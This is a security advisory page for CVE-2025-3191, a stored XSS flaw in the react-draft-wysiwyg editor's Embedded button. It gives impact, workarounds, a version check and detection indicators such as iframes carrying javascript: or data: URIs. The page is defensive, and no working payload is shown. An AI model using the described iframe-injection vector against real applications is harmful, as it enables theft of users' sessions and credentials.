CVE-2025-3191
📋 TL;DR
All versions of react-draft-wysiwyg are vulnerable to stored XSS via the Embedded button feature. Attackers can inject malicious scripts through iframe tags that persist in content, affecting any application using this rich text editor component. This impacts developers and users of web applications built with React that incorporate this package.
💻 Affected Systems
- react-draft-wysiwyg
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Attackers steal user session cookies, credentials, or sensitive data, perform actions as authenticated users, or redirect users to malicious sites.
Likely Case
Attackers inject malicious scripts that execute in users' browsers when viewing compromised content, potentially stealing session data or performing unauthorized actions.
If Mitigated
With proper input validation and output encoding, the risk is reduced to minimal impact, though the vulnerability still exists in the component.
🎯 Exploit Status
Exploitation requires an attacker to have access to create or edit content using the vulnerable editor component. Public proof-of-concept demonstrates the vulnerability via iframe tag injection.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: None
Vendor Advisory: https://security.snyk.io/vuln/SNYK-JS-REACTDRAFTWYSIWYG-8515884
Restart Required: No
Instructions:
No official patch exists. Consider alternative rich text editor packages or implement workarounds. Monitor package repository for updates.
🔧 Temporary Workarounds
Disable Embedded Button
allRemove or disable the Embedded button feature from the editor toolbar configuration to prevent iframe injection.
In your editor configuration, remove 'embedded' from the toolbar options array.
Implement Content Sanitization
allAdd server-side and client-side sanitization of HTML content, particularly filtering or encoding iframe tags.
Use libraries like DOMPurify to sanitize editor content before saving or rendering.
🧯 If You Can't Patch
- Implement strict Content Security Policy (CSP) headers to restrict script execution sources.
- Use network segmentation to isolate vulnerable applications and limit potential impact scope.
🔍 How to Verify
Check if Vulnerable:
Check package.json for react-draft-wysiwyg dependency. If present, the application is vulnerable.Check Version:
npm list react-draft-wysiwygVerify Fix Applied:
Verify workarounds by testing if iframe tags with malicious scripts can be saved and executed through the editor.📡 Detection & Monitoring
Log Indicators:
- Unusual iframe tags in content submissions, especially with javascript: or data: URIs
Network Indicators:
- Unexpected outbound connections from user browsers to external domains after viewing editor content
SIEM Query:
Search for POST/PUT requests containing suspicious iframe patterns in request bodies to editor endpoints.